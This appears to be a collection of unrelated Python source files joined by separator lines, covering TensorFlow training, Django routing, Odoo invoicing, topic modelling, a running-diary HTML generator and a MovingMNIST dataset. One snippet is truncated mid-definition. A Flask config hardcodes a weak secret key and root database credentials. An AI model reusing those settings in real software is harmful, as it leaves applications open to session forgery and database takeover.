            if grad is not None:
                tf.summary.histogram(var.op.name + '/gradients', grad)
    # Track the moving averages of the updated variables.
    variable_averages = tf.train.ExponentialMovingAverage(moving_average_decay, global_step)
    #variables_averages_op = variable_averages.apply(tf.trainable_variables())
    variables_averages_op = variable_averages.apply(update_gradient_vars)
    with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
    #with tf.control_dependencies([apply_gradient_op]):
        train_op = tf.no_op(name='train')
    print('######## length of update_gradient_vars: %d\n' % len(update_gradient_vars))
    return train_op, grads, grads_clip
def train_layerwise(total_loss, global_step, optimizer, learning_rate, moving_average_decay, update_gradient_vars, log_histograms=True):
    """Build a training op with a layer-wise learning-rate split.

    Variables whose scope names contain 'Embeddings/', 'Centralisation/',
    'centers' or 'centers_cts' are trained at the full learning rate;
    all other variables use learning_rate / beta (beta = 100).

    Args:
        total_loss: scalar loss tensor to minimize.
        global_step: step counter variable.
        optimizer: one of 'ADAGRAD'|'ADADELTA'|'ADAM'|'RMSPROP'|'MOM'.
        learning_rate: base learning-rate tensor or float.
        moving_average_decay: decay for the trainable-variable EMAs.
        update_gradient_vars: variables to compute/apply gradients for.
        log_histograms: whether to add variable/gradient histograms.
    Returns:
        train_op: the combined training op.
    Raises:
        ValueError: for an unknown optimizer name.
    """
    # Generate moving averages of all losses and associated summaries.
    loss_averages_op = _add_loss_summaries(total_loss)
    print('######## length of update_gradient_vars: %d\n' % len(update_gradient_vars))
    # Compute gradients.
    # with tf.control_dependencies([loss_averages_op]):
    #     if optimizer=='ADAGRAD':
    #         opt = tf.train.AdagradOptimizer(learning_rate)
    #     elif optimizer=='ADADELTA':
    #         opt = tf.train.AdadeltaOptimizer(learning_rate, rho=0.9, epsilon=1e-6)
    #     elif optimizer=='ADAM':
    #         opt = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=0.1)
    #     elif optimizer=='RMSPROP':
    #         opt = tf.train.RMSPropOptimizer(learning_rate, decay=0.9, momentum=0.9, epsilon=1.0)
    #     elif optimizer=='MOM':
    #         opt = tf.train.MomentumOptimizer(learning_rate, 0.9, use_nesterov=True)
    #     else:
    #         raise ValueError('Invalid optimization algorithm')
    #     grads = opt.compute_gradients(total_loss, update_gradient_vars)
    # Apply gradients.
    #apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
    # beta: ratio between the full learning rate and the reduced one used
    # for the "body" of the network
    beta = 100
    with tf.control_dependencies([loss_averages_op]):
        if optimizer=='ADAGRAD':
            opt1 = tf.train.AdagradOptimizer(learning_rate/beta)
            opt2 = tf.train.AdagradOptimizer(learning_rate)
        elif optimizer=='ADADELTA':
            opt1 = tf.train.AdadeltaOptimizer(learning_rate/beta, rho=0.9, epsilon=1e-6)
            opt2 = tf.train.AdadeltaOptimizer(learning_rate, rho=0.9, epsilon=1e-6)
        elif optimizer=='ADAM':
            opt1 = tf.train.AdamOptimizer(learning_rate/beta, beta1=0.9, beta2=0.999, epsilon=0.1)
            opt2 = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=0.1)
        elif optimizer=='RMSPROP':
            opt1 = tf.train.RMSPropOptimizer(learning_rate/beta, decay=0.9, momentum=0.9, epsilon=1.0)
            opt2 = tf.train.RMSPropOptimizer(learning_rate, decay=0.9, momentum=0.9, epsilon=1.0)
        elif optimizer=='MOM':
            opt1 = tf.train.MomentumOptimizer(learning_rate/beta, 0.9, use_nesterov=True)
            opt2 = tf.train.MomentumOptimizer(learning_rate, 0.9, use_nesterov=True)
        else:
            raise ValueError('Invalid optimization algorithm')
        ## glabal learning rate
        ## layer-wise learning rate for updating the gradients
        # partition the variables: head/center variables get the full rate
        update_gradient_vars1 = []
        update_gradient_vars2 = []
        for var in update_gradient_vars:
            if not ('Embeddings/' in var.op.name or 'Centralisation/' in var.op.name or 'centers' in var.op.name or 'centers_cts' in var.op.name):
                update_gradient_vars1.append(var)
            else:
                update_gradient_vars2.append(var)
        grads1 = opt1.compute_gradients(total_loss, update_gradient_vars1)
        grads2 = opt2.compute_gradients(total_loss, update_gradient_vars2)
        #grads = tf.group(grads1, grads2)
        grads = grads1 + grads2
    # NOTE(review): both apply_gradients calls pass global_step, so the
    # step counter is incremented twice per training step -- confirm.
    apply_gradient_op1 = opt1.apply_gradients(grads1, global_step=global_step)
    apply_gradient_op2 = opt2.apply_gradients(grads2, global_step=global_step)
    apply_gradient_op = tf.group(apply_gradient_op1, apply_gradient_op2)
    # Add histograms for trainable variables.
    if log_histograms:
        for var in tf.trainable_variables():
            tf.summary.histogram(var.op.name, var)
    # Add histograms for gradients.
    if log_histograms:
        for grad, var in grads:
            if grad is not None:
                tf.summary.histogram(var.op.name + '/gradients', grad)
    # Track the moving averages of all trainable variables.
    variable_averages = tf.train.ExponentialMovingAverage(
        moving_average_decay, global_step)
    variables_averages_op = variable_averages.apply(tf.trainable_variables())
    with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
        train_op = tf.no_op(name='train')
    return train_op
|
from django.contrib import admin
from django.urls import path
import firstapp.views
# URL routing: the Django admin site plus the three firstapp pages
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', firstapp.views.home, name="home"),
    path('about/', firstapp.views.about, name="about"),
    path('result/', firstapp.views.result, name="result"),
]
|
from string import ascii_lowercase as low, ascii_uppercase as up

# Atbash cipher table: maps each letter to its mirror (a<->z, b<->y, ...),
# preserving case.  Built with str.maketrans -- string.maketrans was
# removed in Python 3.
TRANSLATION = str.maketrans(up + low, up[::-1] + low[::-1])


def decode(string):
    """Atbash-decode *string*; non-string input yields an error message."""
    return string.translate(TRANSLATION) \
        if isinstance(string, str) else 'Input is not a string'
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013-2015 Marcos Organizador de Negocios SRL http://marcos.do
# Write by Eneldo Serrata (eneldo@marcos.do)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp import models, fields, api, _
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT
from openerp.exceptions import except_orm, Warning, RedirectWarning
class account_invoice(models.Model):
    """Dominican localisation: link credit notes to the invoice they affect
    and track whether further credit notes may still be issued
    (``no_more_cn``)."""
    _inherit = 'account.invoice'

    @api.one
    @api.depends("parent_id")
    def _get_no_more_cn(self):
        # no_more_cn: True once the non-cancelled credit notes reach the
        # parent invoice's untaxed amount
        ncs = self.parent_id.child_ids
        if ncs:
            self.parent_id.no_more_cn = sum(
                [nc.amount_untaxed for nc in ncs if nc.state not in ["cancel"]]) >= self.parent_id.amount_untaxed

    parent_id = fields.Many2one('account.invoice',
                                'Afecta',
                                readonly=True,
                                states={'draft': [('readonly', False)]},
                                help='Factura que afecta')
    child_ids = fields.One2many('account.invoice',
                                'parent_id',
                                u'Notas de credito',
                                readonly=True,
                                states={'draft': [('readonly', False)]},
                                help=u'Estas son todas las de credito para esta factura')
    no_more_cn = fields.Boolean(default=False, copy=False)
    parent_id_number = fields.Char(related="parent_id.number")

    def copy(self, cr, uid, id, default=None, context=None):
        """ Allows you to duplicate a record,
            child_ids, nro_ctrl and reference fields are
            cleaned, because they must be unique
        """
        # BUG FIX: 'default={}' was a shared mutable default argument that
        # this method mutates via default.update(); use None and create a
        # fresh dict per call (backward compatible for all callers).
        if default is None:
            default = {}
        if context is None:
            context = {}
        default.update({
            'child_ids': [],
        })
        return super(account_invoice, self).copy(cr, uid, id, default, context)

    def set_amount_untaxed(self, parent_id, vals):
        # Recompute the parent's no_more_cn flag from the pending write.
        parent_invoice = self.browse(parent_id)
        # NOTE(review): because the outer test requires vals["state"] to be
        # falsy, the inner 'state == "cancel"' branch can never run; left
        # unchanged to preserve behaviour -- confirm the intended condition.
        if not vals.get("state", False) and len(vals) == 1:
            if vals.get("state", False) == "cancel":
                parent_invoice.no_more_cn = (sum([nc.amount_untaxed for nc in parent_invoice.child_ids if nc.state not in ["cancel"]]) - self.amount_untaxed) >= parent_invoice.amount_untaxed
            else:
                parent_invoice.no_more_cn = (sum([nc.amount_untaxed for nc in parent_invoice.child_ids if nc.state not in ["cancel"]]) + self.amount_untaxed) >= parent_invoice.amount_untaxed

    @api.multi
    def write(self, vals):
        """Keep ``no_more_cn`` in sync on state changes, and strip taxes
        from credit notes issued more than 30 days after the parent
        invoice (Dominican rule)."""
        if self.parent_id and self.type in ("in_refund", "out_refund"):
            if vals.get("state", False) == "cancel":
                self.parent_id.no_more_cn = (sum([nc.amount_untaxed for nc in self.parent_id.child_ids if nc.state not in ["cancel"]]) - self.amount_untaxed) == self.parent_id.amount_untaxed
            else:
                self.parent_id.no_more_cn = (sum([nc.amount_untaxed for nc in self.parent_id.child_ids if nc.state not in ["cancel"]]) + self.amount_untaxed) == self.parent_id.amount_untaxed
        # remove tax from out_refund if parent_id date_invoice > 30 days
        # (Dominican rules)
        if self.type == "out_refund" and (
                vals.get("date_invoice", False) or self.date_invoice) and self.parent_id:
            date_invoice = vals.get("date_invoice", False) or self.date_invoice
            # NOTE(review): parent - refund is negative when the parent is
            # older, so 'delta.days > 30' may be inverted -- confirm.
            delta = datetime.strptime(self.parent_id.date_invoice, DEFAULT_SERVER_DATE_FORMAT) - datetime.strptime(
                date_invoice, DEFAULT_SERVER_DATE_FORMAT)
            if delta.days > 30:
                if vals.get("invoice_line", False):
                    for line in vals["invoice_line"]:
                        if line[2].get("invoice_line_tax_id", False):
                            del line[2]["invoice_line_tax_id"]
                for line in self.invoice_line:
                    if line.invoice_line_tax_id:
                        line.invoice_line_tax_id = False
                self.tax_line = False
        return super(account_invoice, self).write(vals)
|
"""votes URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.contrib.auth.decorators import login_required as _lr
from .views import (
SignUpView, VotingListView, VotingAddView, VotingResultsView,
VotingView, UsersVotingListView
)
# Route table for the votes app.  All regexes are raw strings so escapes
# such as \w reach the regex engine unmodified: a non-raw '\w' is an
# invalid escape sequence (DeprecationWarning on modern Python 3).
urlpatterns = [
    url(r'^$', VotingListView.as_view(),
        name='vote_home'),
    url(r'^login/$',
        auth_views.login, {'template_name': 'votes/login.html'},
        name='votes_login'),
    url(r'^logout/$',
        auth_views.logout, {'template_name': 'votes/logout.html'},
        name='votes_logout'),
    url(r'^signup/$',
        SignUpView.as_view(),
        name='votes_signup'),
    url(r'^votings/$',
        _lr(UsersVotingListView.as_view()),
        name='votes_voting_list'),
    url(r'^votings/add/$',
        _lr(VotingAddView.as_view()),
        name='votes_voting_add'),
    url(r'^vote-for/(?P<slug>[-\w]+)/$',
        VotingView.as_view(),
        name='votes_voting'),
    url(r'^vote-for/(?P<slug>[-\w]+)/results/$',
        VotingResultsView.as_view(),
        name='votes_voting_results'),
    url(r'^admin/', include(admin.site.urls)),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
import numpy as np
from sklearn.externals import joblib
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
from time import time
class LDA:
    """Fit an LDA topic model on the corpus stored in news.npy."""
    def __init__(self):
        self.corpus = []
        # news.npy holds tokenized documents; join each document's tokens
        # into one string, stripping non-breaking and ideographic spaces
        self.dataset = np.load('news.npy')
        for i in self.dataset:
            self.corpus.append(' '.join(x.replace(u'\xa0', '').replace(u' ', '') for x in i))
    def print_top_words(self, model, feature_names, n_top_words):
        """Print the n_top_words highest-weight terms of every topic."""
        for topic_idx, topic in enumerate(model.components_):
            message = "Topic #%d: " % topic_idx
            message += " ".join([feature_names[i]
                                 for i in topic.argsort()[:-n_top_words - 1:-1]])
            print(message)
        print()
    def tf(self):
        """Vectorize the corpus with raw term counts and fit the LDA model.

        Returns:
            (lda, tf_feature_names, n_top_words) ready for print_top_words().
        """
        n_samples = 2000      # NOTE(review): only used in the log line below
        n_features = 1000     # vocabulary cap for the vectorizer
        n_components = 5      # number of topics
        n_top_words = 20
        #
        # t0 = time()
        # dataset = fetch_20newsgroups(shuffle=True, random_state=1,
        #                              remove=('headers', 'footers', 'quotes'))
        # data_samples = dataset.data[:n_samples]
        # print("done in %0.3fs." % (time() - t0))
        #
        # print(data_samples)
        # print(self.corpus)
        # print(self.dataset)
        #
        # Use tf (raw term count) features for LDA.
        print("Extracting tf features for LDA...")
        tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2,
                                        max_features=n_features)
        t0 = time()
        tf = tf_vectorizer.fit_transform(self.corpus)
        print("done in %0.3fs." % (time() - t0))
        print()
        print("Fitting LDA models with tf features, "
              "n_samples=%d and n_features=%d..."
              % (n_samples, n_features))
        lda = LatentDirichletAllocation(n_components=n_components, max_iter=1000,
                                        learning_method='online',
                                        learning_offset=50.,
                                        random_state=0)
        t0 = time()
        lda.fit(tf)
        print("done in %0.3fs." % (time() - t0))
        print("\nTopics in LDA model:")
        tf_feature_names = tf_vectorizer.get_feature_names()
        return lda, tf_feature_names, n_top_words
if __name__ == '__main__':
    # Build the corpus, fit the model, then report the top terms per topic.
    lda_model = LDA()
    lda, tf_feature_names, n_top_words = lda_model.tf()
    lda_model.print_top_words(lda, tf_feature_names, n_top_words)
|
#B
# Read "<number> <operator> <number>" from stdin and print floor division
# for '/', modulo for anything else — same behaviour as the original.
left, op, right = input().split()
dividend, divisor = int(left), int(right)
print(dividend // divisor if op == '/' else dividend % divisor)
|
from django.contrib import admin
from .models import Hottake
# Expose the Hottake model in the Django admin with default ModelAdmin options.
admin.site.register(Hottake)
|
import datetime
import os
import goldencheetah
# TODO Get rid of this hack in this headless version (or keep it so I can make
# TODO a hybrid script that also runs in GC?)
# chr(10) == "\n"; built this way because saving a literal newline inside the
# GoldenCheetah editor created a real line break and a syntax error on reload.
NEWLINE = chr(10)
# Days without a recorded activity that should still show an explanation in
# the diary instead of an empty cell (keys are calendar dates).
HARDCODED_EXCUSES = {
    datetime.date(2023, 1, 23): "Return from USA",
    datetime.date(2023, 1, 9): "Food poisoning",
    datetime.date(2022, 12, 29): "Non-covid respiratory suffering",
    datetime.date(2022, 12, 23): "Fly to USA",
    datetime.date(2022, 8, 15): "Travel London to Carqueiranne",
    datetime.date(2022, 8, 3): "Blood blister + return from USA",
    datetime.date(2022, 7, 15): "Fly to USA",
    datetime.date(2022, 7, 3): "Left hip lateral",
    datetime.date(2022, 6, 20): "COVID19",
    datetime.date(2022, 6, 19): "COVID19",
    datetime.date(2022, 6, 18): "COVID19",
    datetime.date(2022, 6, 17): "COVID19",
    datetime.date(2022, 4, 1): "Return from USA",
    datetime.date(2022, 3, 18): "Headache, tired, fearing Tina's bronchitis",
}
def workout_importance(workout):
    """Rank a workout code so the most interesting run colours the day.

    Comparison is case-insensitive; None and unknown codes rank 0
    (least important).
    """
    if workout is None:
        return 0
    ranking = (
        (10, ("race",)),
        (9, ("vo2max", "interval", "race pace")),
        (8, ("cv",)),
        (7, ("repetition", "speed")),
        (6, ("threshold",)),
        (5, ("endurance",)),
        (4, ("ga",)),
        (3, ("recovery", "warmup", "cooldown")),
    )
    code = workout.lower()
    for score, codes in ranking:
        if code in codes:
            return score
    return 0
def write_days_activities(activities_for_the_day):
    """Return the HTML fragment listing one day's activities.

    Runs are listed individually (distance + workout code, plus a "st"
    superscript when strides were done); every other sport is summed into a
    single line per sport — Elliptical by time, the rest by distance.
    """
    text = ""
    for activity in activities_for_the_day:
        if activity.sport == "Run":
            strides_text = ""
            if "strides" in activity.keywords:
                strides_text = "<sup>st</sup>"
            text += '<p class="activity">{:.1f}km {}{}</p>'.format(
                activity.distance, activity.workout_code, strides_text
            )
    others_sums = {}
    for activity in activities_for_the_day:
        if activity.sport != "Run":
            if activity.sport not in others_sums:
                others_sums[activity.sport] = {"distance": 0, "time": 0}
            others_sums[activity.sport]["distance"] += activity.distance
            others_sums[activity.sport]["time"] += activity.time_moving
    for sport in others_sums:
        if sport == "Elliptical":
            hours, minutes = goldencheetah.seconds_to_hours_minutes(
                others_sums[sport]["time"]
            )
            # Bug fix: these paragraphs were left unclosed (the Run branch
            # above closes its <p>); emit the matching </p>.
            text += '<p class="activity other">Σ {}:{:02d} {}</p>'.format(
                hours, minutes, sport
            )
        else:
            text += '<p class="activity other">Σ {:.1f}km {}</p>'.format(
                others_sums[sport]["distance"], sport
            )
    return text
def write_day(f, activities, excuse, idx):
    """Given a list of activities for a day, writes the HTML for it.
    Requires an idx, i.e., the day's number in the week, to know how
    far left/right on the page things need to end up."""
    # Only write out an excuse if there is no activity that day.
    if len(activities) == 0:
        # No activity and no excuse either: render nothing for this day.
        if excuse is None:
            return
        day = '<div class="day day-{} workout-excuse">{}</div>'.format(idx, excuse)
        f.write(day)
        return
    # Amount *ran* that day
    distance = 0
    workout = None
    run_counter = 0
    has_sport_other_than_running = False
    for activity in activities:
        if activity.sport == "Run":
            run_counter += 1
            distance = distance + activity.distance
            # Deciding the "main" colour to use for a given day based on which
            # run type is the most interesting.
            if workout is None or workout_importance(workout) < workout_importance(
                activity.workout_code
            ):
                workout = activity.workout_code
        else:
            has_sport_other_than_running = True
    # No run at all: fall back to CSS classes for cross-training / rest days.
    if workout is None:
        if has_sport_other_than_running:
            workout = "not-a-run"
        else:
            workout = "nothing"
    day = '<div class="day day-{} workout-{}">'.format(idx, workout.lower())
    # NOTE(review): %-d / %h are glibc strftime extensions — not portable to
    # Windows strftime.
    day += "<datetime>" + activities[0].date.strftime("%-d %h") + "</datetime>"
    # Show a daily Σ total only when there was more than one run.
    if run_counter > 1:
        day += '<p class="distance">Σ {:.1f}km</p>'.format(distance)
    day += write_days_activities(activities)
    day += "</div>"
    f.write(day)
def sum_week_distance_time(activities):
    """Given a week of activities, i.e. a dict of day->activitiesforthatday,
    sums up all the distances and times for runs, and returns them"""
    runs = [
        activity
        for days_activities in activities.values()
        for activity in days_activities
        if activity.sport == "Run"
    ]
    distance = sum(run.distance for run in runs)
    time = sum(run.time_moving for run in runs)
    return (distance, time)
def write_week(f, activities):
    """Handles writing for a certain week. Input is a dict of
    day -> activities for that day."""
    # Relies on dict insertion order: the first key is the earliest day.
    days = [*activities]
    first_day = days[0]
    distance, time = sum_week_distance_time(activities)
    hours, minutes = goldencheetah.seconds_to_hours_minutes(time)
    # isocalendar() fields accessed by name — requires Python 3.9+.
    isodate = first_day.isocalendar()
    overview = (
        NEWLINE + '<div class="week">'
        '<time class="when">{}W{}</time>'
        '<p class="total-distance">{:.1f} km</p>'
        '<p class="total-time">{:d}h{:02d}</p>'
    )
    overview = overview.format(isodate.year, isodate.week, distance, hours, minutes)
    header = ""
    footer = "" "</div>"
    f.write(overview)
    f.write(header)
    # Days are written oldest to newest; idx drives the day-N CSS class.
    for idx, day in enumerate(sorted(activities)):
        write_day(f, activities[day], HARDCODED_EXCUSES.get(day), idx)
    f.write(footer)
def write_training_log(f, activities):
    """Creates HTML page of a training log.
    Activities are in the format as returned by group_by_week."""
    header_a = (
        "<!DOCTYPE html>"
        "<html>"
        "<head><title>Diary</title>"
        '<meta charset="utf-8" />'
        '<meta name="viewport" content="width=device-width, initial-scale=1" />'
    )
    header_b = NEWLINE.join(
        [
            "</head>",
            "<body>",
            "<p>Generated on {}.</p>".format(
                datetime.datetime.now().strftime("%Y-%m-%d")
            ),
        ]
    )
    footer = NEWLINE + "</body>" "</html>"
    f.write(header_a)
    # CSS is inlined between the two header chunks so the page is standalone.
    write_css(f)
    f.write(header_b)
    # Most recent week first.
    for week in reversed(sorted(activities)):
        write_week(f, activities[week])
    f.write(footer)
def write_css(f):
    """Inline the contents of diary.css into the page as a <style> block."""
    with open("diary.css", "r") as css_file:
        stylesheet = css_file.read()
    f.write(NEWLINE + '<style type="text/css">' + stylesheet + "</style>" + NEWLINE)
# Pull every activity (all sports), bucket them by ISO week, and render the
# whole diary to ./output/diary.html.
all_activities = goldencheetah.get_all_activities(sport=None)
all_activities = goldencheetah.group_by_week(all_activities)
# Idiomatic replacement for the try/mkdir/except FileExistsError dance.
os.makedirs("./output", exist_ok=True)
NAME = "./output/diary.html"
with open(NAME, "w") as tmp_f:
    write_training_log(tmp_f, all_activities)
|
#-*-coding:utf-8-*-
# vim: ft=python
# Development settings for the scriptfan Flask application.
# debug: enables the interactive debugger/reloader — never use in production.
DEBUG=True
USE_DEBUGGER=True
# used for session signing; replace with a real secret outside development
SECRET_KEY='youshouldnotknowthis'
# application side settings: items per page in paginated listings
PAGE_SIZE=20
# database settings (local dev MySQL; credentials are dev-only)
SQLALCHEMY_DATABASE_URI='mysql://root:root@localhost/scriptfan_dev?charset=utf8'
SQLALCHEMY_ECHO=False
# LOGGING CONFIG
LOGGER_NAME='scriptfan'
|
from sklearn.ensemble import AdaBoostClassifier
from sklearn import svm
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import linear_model
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.tree import DecisionTreeClassifier
# Three base estimators originally intended for the (commented-out)
# VotingClassifier ensemble below.
clf1 = LogisticRegression(solver='lbfgs', multi_class='multinomial',random_state=1)
clf2 = RandomForestClassifier(n_estimators=50, random_state=1)
clf3 = GaussianNB()
#clf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='hard')
# Candidate models to benchmark, in insertion order.
method=[]
method.append(DecisionTreeClassifier())
method.append(MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(5, 2), random_state=1))
method.append(KNeighborsClassifier(n_neighbors=10))
method.append(AdaBoostClassifier(n_estimators=10000))
method.append(RandomForestClassifier(n_estimators=100))
method.append(GradientBoostingClassifier(n_estimators=100, learning_rate=1.0,max_depth=1, random_state=0))
#method.append(elcf)
method.append(svm.SVC())
# NOTE(review): the entries below are regressors (LinearRegression, Ridge,
# Lasso, BayesianRidge, SVR) mixed in with classifiers — confirm downstream
# code expects both kinds in the same list.
method.append(linear_model.LinearRegression())
method.append(linear_model.Ridge(alpha=0.5))
method.append(linear_model.Lasso(alpha=0.1))
method.append(linear_model.BayesianRidge())
method.append(linear_model.LogisticRegression())
method.append(svm.SVR())
|
import pandas as pd
from openpyxl import load_workbook
from openpyxl.styles import Font
# Load excel files in the DataFrame
df_1 = pd.read_excel('sales.xlsx', sheet_name='Sheet')
df_2 = pd.read_excel('sales.xlsx', sheet_name='Sheet1')
df_3 = pd.read_excel('sales_3.xlsx')
# Combine the DataFrames; ignore_index avoids duplicate row labels from the
# three sources.
df = pd.concat([df_1, df_2, df_3], sort=False, ignore_index=True)
# View the values in dataframe at location 50, If we do not ignore the index
# then we will get 3 values from 3 DataFrames
# print(df.loc[50])
# Group the data by Item and report units sold per item.
print(df.groupby(['Item']).sum()['Units Sold'])
# Create a new Total Column
df['Total'] = df['Cost per'] * df['Units Sold']
# Save the data into a new Excel file
df.to_excel("total_sales.xlsx", index=None)
# Now open the workbook to bold the Total header cell.
wb = load_workbook('total_sales.xlsx')
ws = wb.active
total_col = ws['G1']
total_col.font = Font(bold=True)
# Bug fix: Workbook.save() requires a filename — the bare wb.save() raised
# TypeError, so the formatting was never written to disk.
wb.save('total_sales.xlsx')
"""
** Author: Xiao Yue
** Date: 2020-08-23
"""
class PlanManager():
    """Holds the household budgeting plans (income split, investment split,
    total-asset split) and derives concrete amounts from them."""
    def __init__(self):
        # How monthly income is divided: fixed costs are absolute amounts,
        # flexible budgets are fractions of what remains after fixed costs.
        self.income_arrangement_plan = {
            '固定开支': {
                '房租': 3430
            },
            '非固定开支': {
                '一般消费预算': 0.15,  # ~1200
                '恋爱基金': 0.1,  # ~600
                '特别预算': 0.15,  # ~1200
                "投资预算": 0.6,  # ~6000
            },
        }
        # How the investment budget itself is split across asset classes.
        self.investment_plan = {
            "指数基金": 0.65,  # 3900 (165/day)
            "货币基金": 0.1,  # 600 (20/day)
            "股票": 0.1,  # 600 (20/day)
            "债券": 0.1,  # 1200
            "贵金属": 0.05  # 300
        }
        # Not configured by default; assign via the setter below.
        self.total_asset_arrangement_plan = None
    def set_income_arrangement_plan(self, plan):
        self.income_arrangement_plan = plan
    def set_investment_plan(self, plan):
        self.investment_plan = plan
    def set_total_asset_arrangement_plan(self, plan):
        self.total_asset_arrangement_plan = plan
    def get_income_arrangement_plan(self):
        return self.income_arrangement_plan
    def get_investment_plan(self):
        return self.investment_plan
    def get_total_asset_arrangement_plan(self):
        return self.total_asset_arrangement_plan
    def save_plan_as_file(self):
        # Persistence is not implemented yet.
        pass
    def get_investment_amount(self, income):
        """Return the amount to invest: the investment fraction applied to
        total income minus all fixed costs."""
        fixed_spend = sum(self.income_arrangement_plan['固定开支'].values())
        investable_fraction = self.income_arrangement_plan['非固定开支']['投资预算']
        return investable_fraction * (sum(income) - fixed_spend)
|
import math
def read_numbers_from_file(file_name):
    """Read integers from a text file and return them sorted ascending.

    File format: the first line holds the count N, followed by N lines with
    one integer each.

    Bug fix: the original never closed the file handle; a `with` block
    guarantees it is closed even if parsing raises.
    """
    with open(file_name, "r") as text_file:
        num_nbrs = int(text_file.readline())
        num_list = [int(text_file.readline()) for _ in range(num_nbrs)]
    num_list.sort()
    return num_list
def read_numbers ():
|
# Count how many times the maximum value occurs in the sequence.
nums = [3, 2, 1, 3]  # renamed: the original shadowed the builtin `list`
max_num = max(nums)
print(nums.count(max_num))  # reuse max_num instead of recomputing max()
|
import os.path
from typing import Callable, Optional
import numpy as np
import torch
from torchvision.datasets.utils import download_url, verify_str_arg
from torchvision.datasets.vision import VisionDataset
class MovingMNIST(VisionDataset):
    """`MovingMNIST <http://www.cs.toronto.edu/~nitish/unsupervised_video/>`_ Dataset.
    Args:
        root (string): Root directory of dataset where ``MovingMNIST/mnist_test_seq.npy`` exists.
        split (string, optional): The dataset split, supports ``None`` (default), ``"train"`` and ``"test"``.
            If ``split=None``, the full data is returned.
        split_ratio (int, optional): The split ratio of number of frames. If ``split="train"``, the first split
            frames ``data[:, :split_ratio]`` is returned. If ``split="test"``, the last split frames ``data[:, split_ratio:]``
            is returned. If ``split=None``, this parameter is ignored and the all frames data is returned.
        transform (callable, optional): A function/transform that takes in an torch Tensor
            and returns a transformed version. E.g, ``transforms.RandomCrop``
        download (bool, optional): If true, downloads the dataset from the internet and
            puts it in root directory. If dataset is already downloaded, it is not
            downloaded again.
    """
    _URL = "http://www.cs.toronto.edu/~nitish/unsupervised_video/mnist_test_seq.npy"
    def __init__(
        self,
        root: str,
        split: Optional[str] = None,
        split_ratio: int = 10,
        download: bool = False,
        transform: Optional[Callable] = None,
    ) -> None:
        super().__init__(root, transform=transform)
        # All files live under <root>/MovingMNIST/.
        self._base_folder = os.path.join(self.root, self.__class__.__name__)
        self._filename = self._URL.split("/")[-1]
        if split is not None:
            verify_str_arg(split, "split", ("train", "test"))
        self.split = split
        # The cut must leave at least one frame on each side; the bounds
        # suggest the raw sequences are 20 frames long — TODO confirm.
        if not isinstance(split_ratio, int):
            raise TypeError(f"`split_ratio` should be an integer, but got {type(split_ratio)}")
        elif not (1 <= split_ratio <= 19):
            raise ValueError(f"`split_ratio` should be `1 <= split_ratio <= 19`, but got {split_ratio} instead.")
        self.split_ratio = split_ratio
        if download:
            self.download()
        if not self._check_exists():
            raise RuntimeError("Dataset not found. You can use download=True to download it.")
        data = torch.from_numpy(np.load(os.path.join(self._base_folder, self._filename)))
        # Slice axis 0 for the split — presumably the frame axis of the
        # on-disk array; verify against the dataset description.
        if self.split == "train":
            data = data[: self.split_ratio]
        elif self.split == "test":
            data = data[self.split_ratio :]
        # Swap the first two axes (sequence-first) and insert a singleton
        # channel axis so each item is (T, 1, H, W).
        self.data = data.transpose(0, 1).unsqueeze(2).contiguous()
    def __getitem__(self, idx: int) -> torch.Tensor:
        """
        Args:
            index (int): Index
        Returns:
            torch.Tensor: Video frames (torch Tensor[T, C, H, W]). The `T` is the number of frames.
        """
        data = self.data[idx]
        if self.transform is not None:
            data = self.transform(data)
        return data
    def __len__(self) -> int:
        return len(self.data)
    def _check_exists(self) -> bool:
        # Presence of the single .npy file is the whole existence check.
        return os.path.exists(os.path.join(self._base_folder, self._filename))
    def download(self) -> None:
        """Fetch mnist_test_seq.npy into the base folder (no-op if present)."""
        if self._check_exists():
            return
        download_url(
            url=self._URL,
            root=self._base_folder,
            filename=self._filename,
            md5="be083ec986bfe91a449d63653c411eb2",
        )
|
#Tino project by Cédric Couvrat
#Bonjour
#0.11 : on met l'algo principal dans un ordre plus compréhensible ! attention nécessite card2data 0.9
#0.10 : on ajoute la fonction de repère temporel
#0.9 : on sait envoyer des données par serie à l'arduino
#0.8 : utilisation du typage de données pour différencier ce qui est envoyé par arduino
#----- on attend 2 distances pour déclancher la question
#0.7 : on fait des fonctions pour la lisibilité et la réutilisabilité
